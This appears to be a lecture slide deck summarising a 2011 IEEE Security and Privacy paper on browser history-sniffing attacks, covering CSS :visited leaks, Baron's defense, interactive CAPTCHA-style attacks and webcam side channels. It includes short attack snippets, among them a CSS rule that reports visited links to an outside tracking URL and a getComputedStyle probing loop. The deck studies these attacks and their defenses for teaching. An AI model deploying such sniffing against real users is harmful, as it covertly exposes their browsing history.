I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history

I Still Know What You Visited Last Summer: User interaction and side-channel attacks on browsing history Zachary Weinberg Eric Y. Chen PavithraRameshJayaraman Collin Jackson Carnegie Mellon University IEEE Symposium on Security and Privacy, May 2011

Outline Introduction Automated Attacks Exp 1: Interactive Attacks Exp 2: Side-Channel Attacks Related Work Conclusion

Introduction • History Sniffing through CSS :visited • Andrew Clover, 2002, http://seclists.org/bugtraq/2002/Feb/271 in HTML <a id="link1" href="http://google.com/">Visit Google!</a> in CSS #link1:visited { color: red; background: url(http://140.115.53.28/track.php?url=google.com); }

Introduction • L. David Baron (2010) defence: http://dbaron.org/ mozilla/visited-privacy • CSS has a selector :link that matches unvisited links, and a selector :visited that matches visited links. So typical styles for links might be expressed in the form: • :link, :visited { • /* for all links */ • text-decoration: underline; • } • :link { • /* for unvisited links */ • color: blue; • } • :visited { • /* for visited links */ • color: purple; • }

Introduction • Authors can then write script that uses the getComputedStyle method to determine which links have been visited: • varlinks = document.links; • for (vari = 0; i < links.length; ++i) { • var link = links[i]; • /* exact strings to match actually need to be • auto-detected using reference elements */ • if (getComputedStyle(link, "").color == "rgb(0, 0, 128)") { • // we know link.href has not been visited • } else { • // we know link.href has been visited • } • } • AVOID this: make getComputedStyle act as though all links are unvisited

Introduction • Make certain CSS selectors act as though links are always unvisited • Limits the CSS properties that can be used to style visited links to color, background-color, border-*-color, outline-color, column-rule-color, fill, and stroke • The latest versions of Firefox, Chrome, Safari, and IE all adopt this defense • still vulnerable with interactive attacks as will be shown later

Background • NCSA Mosaic, one of first graphical Web browsers: • drew hyperlinks in blue if they referred to a page that had not yet been visited, in purple otherwise • Netscape Navigator inherited this feature • Web evolution: rely on server side processing: • Later Javascript enabled run programs inside web pages • …need for security… • Same origin policy: Web partitioned in Web servers, JS can see data on the HTTP server that produced them! • not applied to hyperlinks. • Sites need to link to each other

Introduction • Andrew Clover in a BUGTRAQ: • First showed the browsing history leakage • Jang et al., An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications • Small sets of links (6~220) probed by real exploiters • 46 popular websites, including one from Alexa Top100 This makes interactive attacks possible

Introduction • What can history sniffers do? • Benign: • Websites could use history sniffing to determine whether their users have visited known phishing sites(banks) • Websites could seed visitors’ history with URLs made up for the purpose, and use the URLs to re-identify their visitors. • Cookies also provide this • Malicious: • Track visitors across sites for advertising purpose, determining whether they also visit a site’s competitors.(tracking cookies) • Attackers can construct more targeted phishing pages, by impersonating only sites that a particular victim is known

Automated Attacks How automated attacks worked and how browsers now prevent them?

Automated Attacks • Direct sniffing:guess URLs of pages that its visitors visited, create links pointing to those URLs, and determine whether each visitor has indeed visited them by inspecting the links’ computed styles <style> a:visited { color: red; } </style> varurl_array = new Array('http://a.com', 'http://b.com'); varvisited_array = new Array(); varlink_el = document.createElement('a'); varcomputed_style = document.defaultView.getComputedStyle(link_el, ""); for (vari = 0; i < url_array.length; i++) { link_el.href = array[i]; if (computed_style.getPropertyValue("color") == 'rgb(255, 0, 0)'){ visited_array.push(url_array[i]); } }

Automated Attacks • Indirect Sniffing • Make visited and unvisited links take different amounts of space, which causes unrelated elements on the page to move; inspect the positions of those other elements. • Make visited and unvisited links cause different images to load. • background-image style used in :visited rule • Not requires JavaScript

Automated Attacks • Side-channel sniffing • Timing attacks • the attacker can make the page take longer to lay out if a link is visited than if it is unvisited. Measurable difference in time if • Color is Transparent • Line is Underlined • Any other style rules in :visited

Automated Attacks • They discovered a side side channel for history sniffing in early beta versions of Firefox 4 (with Baron’s defense), reported to Mozilla and is resolved (Beta 10) • Firefox looked up history db entries in background & draws page pretending links were unvisited • If any links visited, page was redrawn. Changing link target starts process over • Firefox 4 generates event MozAfterPaint on redrawing of a page • Attacker could add a event handler for MozAfterPaintand find out that ther is a visited link! • Defense • Baron’s solution does well for all 3 types (direct/indirect/side-channel) above

Automated Attacks • Baron’s Defense in Firefox 4, Chrome 9, Safari 5, IE9 : • Pretend that all links are unvisited(block direct sniffing) • Visited links are always the same size and take the same amount of time to draw as their unvisited counterparts (block indirect and sidechannelsniffing) • Timing attack: A browser will do one history lookup per style rule, and it will do it last, after all the other work of selector matching • Rule that needs more than one lookup(:visited + :visited { ... }) which is meant to apply to the second of two visited links in a row, • will be ignored by a browser that implements the defense

Automated Attacks • User study (307 participants): • Demonstrate: history sniffing remains feasible (via interactive techniques) not covered by defense • Developed proofs of concept of six history sniffing exploits with Baron’s defense in place: • Four with interaction with user, • Two involving detection of color of screen with webcam

Experiment 1: Interactive Attacks • Require victims to interact with malicious sites • The authors claim that interactive attacks can be disguised as “normal” interactive tasks that users will not find surprising or suspicious • Used Amazon’s Mechanical Turk • Recruit 307 participants • All tasks in this experiment operate within the constraints of Baron’s defense • Visited-link styles only change the color on the screen • Pretend to be CAPTCHA tests • CAPTCHA: Completely Automated Public Turing test to tell Computers and Humans Apart

Exp 1: Interactive Attacks • Word CAPTCHA • Each word is a hyperlink to an URL that the attacker wishes to probe • If URL unvisited, word drawn in the same color as the background user will not type the word  reveal history • Drawback: small #urlsrevealed because CAPTCHAs should be short

Exp 1: Interactive Attacks • Character CAPTCHA • Every letter represents 3 URLs • Clever choice font-symbols to test visited-ness • Font that mimics seven-segment LCD symbols. • Each visible character: four characters, superimposed, three of them visible only if an associated link is visited • Barriers: • Font rarely found installed • Baron’s defence does not allow visited-link rules to change the transparency of a color(attacker can make always be nearly transparent or black visited - white unvisited)

Exp 1: Interactive Attacks • If links corresponding to 4 + 5 are visited user see a 9 ; 4 + F = A ; 5 + F = 6 ; 4 + 5 + F = 8 • “ – “ is always-on: If omitted victims see blanks and type ONLY one space and confuse the next characters position • Eight-character: probes 24 sites, 12-character: probes 36

Exp 1: Interactive Attacks • Chessboard puzzle • Each square contains a URL • Only the pawns corresponding to visited sites are made visible • Using SVG or text to control the pawns(Unicode dingbats) • Victims asked to click on all pawns so clicks on visited sites

Exp 1: Interactive Attacks Pattern matching puzzle Four SVG shapes, whose fill color depends on the visitedness of four URLs Four choices for each of the two images to be selected: visitedness of four links Multiple puzzles could work…

Exp 1: Interactive Attacks • Did not sniffed history: • Just prove tasks could be done by a typical user accurately, quickly, and without frustration • would not have known the ratio of visited/unvisited links to expect for each prompt, • nor would we have been able to detect errors • Randomly generated task instances corresponding to known proportions of visited and unvisited links. • Each participant fixed #trials/task • skipped tasks not working with participants’ browsers

Exp 1: Interactive Attacks • They run automated history-sniffing exploits on all the participants • They used URL set from wtikay.comof 7012 commonly visited URLs (from Alexa Top 5000) for this test • recorded only the total elapsed time & #URLs detected as visited

Results • Not all participants completes all tasks • usable data: > 177 participants for each task • Chessboard first in accuracy almost all participants scoring ~ 100% • Word CAPTCHA easier that character CAPTCHA • Pattern match worse

Exp 1: Interactive Attacks

Results • In next slide: • Chessboard the winner: median of ~1000 queries per minute. This includes: • how fast a victim can do the task & • how many URLs the task encodes • Character CAPTCHA second because encoded many URLS • Challenged participants to carry out dozens of instances • No significant effect of fatigue(except participants who refused to complete all the requested trials of the character CAPTCHA) • “Hawthorne effect”: aware that performance was being measured , they performed better • Motivation payment on speed & accuracy

Exp 1: Interactive Attacks: Achievable history sniffing Second because encodes many URLs

Exp 1: Interactive Attacks % is small: so attackers able to assume sparse set of visited links. Janc & Olejnik : But sparseness over this generic link set may not equate to sparseness over a more targeted set—and the link sets found by Jang were quite targeted indeed.

Exp 1: Interactive Attacks

Discussion • Defend? further restricting the functionality of visited link history • either the circumstances under which links are revealed to be visited, or the capabilities of visited-link styles • Links not drawn same color as the background • Limit cases which reveal visited links • Same domain policy for revealing links • But how to see visited links any more? • use of the whitelist?

Discussion • Even so attacker can work around a white list! • With SafeHistory: If attacker predict the location of a link to a site of interest on a whitelisted page, they can draw pictures(iframes) show one pixel of the whitelisted page, directly above that link • Use “private browsing” mode! • Remember only until shut down

Exp 2: Side-channel Attacks • Idea: • Backlit screens illuminate user’s & environment’s light • Color of light varies on computer screen. • If color of an area depends on link visitidness, camera can detect it • Two obstacles: • User must give permission to camera • To probe many links • Change color frequently…make screen flash <blink>…annoys users…epileptic seizures!

Exp 2: Side-channel Attacks • Created 2 test variants: • Rectangular box of uniform color to be hyperlink, periodically change & detected by webcam • Generated Random 20 URLs with 10 visited ones • Variant 1: • Designed to comply with the WCAG standard for seizure safety • Variant 2: • Make entire browser window flash • Use brighter color

Exp 2: Side-channel Attacks • Author test • tested authors’ computers (a Macbook Pro with built-in webcam in three settings with diverse backgrounds: an ofﬁce cubicle, a bedroom, and a living room!!! ) • 100% accuracy for both variants in all condition • Will-lit room • Person stays still in front of the computer • In a dark room, accuracy dropped to 50% • Field test • 60 / 307 participants performed the webcam test

Exp 2: Side-channel Attacks Accuracy rate is highly variable in the field High error rate: participants moving around during the task most serious obstacle: persuading victims to allow access to their webcams

Privacyattacks on other than visited-link history • Page cache: • Browsers cache resources retrieved from Web. • Time of a page load determines whether resource already inthe browser’s cache • time indicates if user has visited • Felten et al., Timing Attacks on Web Privacy • DNS cache: • Maps name to IPs. • Attackers can induce the browser to DNS lookup, measure time it takes • Can reveal which sites a user has visited & user search queries user made • Felten et al., Timing Attacks on Web Privacy • Both tactics above • Only for the first time • Short-term history

Conclusion • Automated history sniffing attacks have successfully been blocked by Baron’s solution • Interactive attacks are not • This paper developed Proof Of Concept of 6 history sniffing exploited against Baron’s defense • 4 interactive attacks • 2 detection of the screen through webcam

I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history